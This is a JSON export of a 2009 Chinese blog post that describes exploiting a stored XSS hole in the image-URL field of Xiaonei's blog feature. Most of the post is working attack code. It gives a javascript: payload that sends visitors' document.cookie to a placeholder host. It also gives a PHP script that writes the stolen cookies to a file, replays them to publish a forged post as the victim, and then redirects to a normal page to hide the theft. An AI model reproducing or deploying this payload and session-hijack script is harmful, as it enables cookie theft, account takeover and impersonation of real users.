{"id":309,"date":"2009-04-12T21:30:00","date_gmt":"2009-04-12T01:30:00","guid":{"rendered":""},"modified":"2013-11-22T15:14:40","modified_gmt":"2013-11-22T07:14:40","slug":"%e6%a0%a1%e5%86%85%e7%bd%91%e4%b8%80%e4%b8%aa%e8%b7%a8%e7%ab%99%e6%bc%8f%e6%b4%9e%e7%9a%84%e5%88%a9%e7%94%a8","status":"publish","type":"post","link":"https:\/\/kyle.ai\/blog\/309.html","title":{"rendered":"\u6821\u5185\u7f51\u4e00\u4e2a\u8de8\u7ad9\u6f0f\u6d1e\u7684\u5229\u7528"},"content":{"rendered":"<p>\u6821\u5185\u7f51\u5728\u53d1blog\u65f6\u5bf9\u63d2\u5165\u56fe\u7247\u8fc7\u6ee4\u4e0d\u4e25\u683c\uff0c\u5b58\u5728xss\u6f0f\u6d1e<\/p>\n<p>\u5728\u53d1blog\u65f6\u5c06\u63d2\u5165\u56fe\u7247URL\u5199\u4e3a\u5982\u4e0b\u4ee3\u7801\u5373\u53ef\u89e6\u53d1\uff1a<\/p>\n<pre class=\"brush: php; title: ; notranslate\" title=\"\">\r\njavascript:window.location.href='http:\/\/xxxxx\/test.php?cookie='+document.cookie\r\n<\/pre>\n<p>test.php\u7684\u4f5c\u7528\u662f\u7a83\u53d6cookie\u3001\u4f2a\u9020\u9605\u89c8\u8005\u8eab\u4efd\u53d1\u4e00\u4e2ablog\u3001\u8df3\u8f6c\u5230\u4e00\u4e2a\u6b63\u5e38\u7684\u65e5\u5fd7,\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n<pre class=\"brush: php; title: ; notranslate\" title=\"\">\r\n&lt;?php\r\nob_start();\r\n$url = \u2018blog.xiaonei.com\u2019;\r\n$cookie=$_GET&#x5B;'cookie'];\r\n$cookie1=$cookie.&quot;\\r\\n\\r\\n&quot;;\r\nfputs(fopen(\u2018a.txt\u2019,'a+\u2019),$cookie1); \/\/cookie\u5199\u5165 a.txt\r\n\r\n\/\/\u53d1\u4e00\u6761\u4f2a\u9020\u7684\u65e5\u5fd7\uff0c\u8fd9\u6761\u65e5\u5fd7\u91cc\u9762\u4e5f\u53ef\u4ee5\u63d2\u5165\u6076\u610f\u4ee3\u7801\r\n$sock = fsockopen(&quot;$url&quot;, 80, $errno, $errstr, 30);\r\nif (!$sock) die(&quot;$errstr ($errno)\\n&quot;);\r\n$data = &quot;title=test by fly&amp;body=test by fly&amp;categoryId=0&amp;blogControl=99&amp;passwordProtedted=0&amp;passWord=&amp;blog_pic_id=&amp;pic_path=&amp;activity=&amp;id=&amp;relative_optpe=&quot;;\r\n\r\nfwrite($sock, &quot;POST http:\/\/$url\/NewEntry.do HTTP\/1.1\\r\\n&quot;);\r\nfwrite($sock, &quot;Accept: *\/*\\r\\n&quot;);\r\nfwrite($sock, &quot;Referer: http:\/\/$url\\r\\n&quot;);\r\nfwrite($sock, &quot;Accept-Language: zh-cn\\r\\n&quot;);\r\nfwrite($sock, &quot;Content-Type: application\/x-www-form-urlencoded\\r\\n&quot;);\r\nfwrite($sock, &quot;Accept-Encoding: gzip, deflate\\r\\n&quot;);\r\nfwrite($sock, &quot;User-Agent: Mozilla\\r\\n&quot;);\r\nfwrite($sock, &quot;Host: $url\\r\\n&quot;);\r\nfwrite($sock, &quot;Content-Length: &quot;.strlen($data).&quot;\\r\\n&quot;);\r\nfwrite($sock, &quot;Connection: Keep-Alive\\r\\n&quot;);\r\nfwrite($sock, &quot;Cache-Control: no-cache\\r\\n&quot;);\r\nfwrite($sock, &quot;Cookie:&quot;.$cookie.&quot;\\r\\n\\r\\n&quot;);\r\nfwrite($sock, $data);\r\n\r\n$headers = &quot;&quot;;\r\nwhile ($str = trim(fgets($sock, 4096)))\r\n     $headers .= &quot;$str\\n&quot;;\r\necho &quot;\\n&quot;;\r\n$body = &quot;&quot;;\r\nwhile (!feof($sock))\r\n     $body .= fgets($sock, 4096);\r\n\r\nfclose($sock);\r\n\/\/echo $body;\r\n\r\n\/\/\u8df3\u8f6c\u5230\u4e00\u4e2a\u6b63\u5e38\u7684\u65e5\u5fd7\r\nHeader(&quot;Location: http:\/\/blog.xiaonei.com\/GetEntry.do?id=xxxx&amp;owner=xxxxx&quot;);\r\nob_end_flush();\r\n\r\n?&gt;\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u6821\u5185\u7f51\u5728\u53d1blog\u65f6\u5bf9\u63d2\u5165\u56fe\u7247\u8fc7\u6ee4\u4e0d\u4e25\u683c\uff0c\u5b58\u5728xss\u6f0f\u6d1e \u5728\u53d1blog\u65f6\u5c06\u63d2\u5165\u56fe\u7247URL\u5199\u4e3a\u5982\u4e0b\u4ee3\u7801\u5373\u53ef\u89e6\u53d1\uff1a [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-309","post","type-post","status-publish","format-standard","hentry","category-skill"],"_links":{"self":[{"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/posts\/309","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/comments?post=309"}],"version-history":[{"count":2,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/posts\/309\/revisions"}],"predecessor-version":[{"id":5093,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/posts\/309\/revisions\/5093"}],"wp:attachment":[{"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/media?parent=309"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/categories?post=309"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/tags?post=309"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}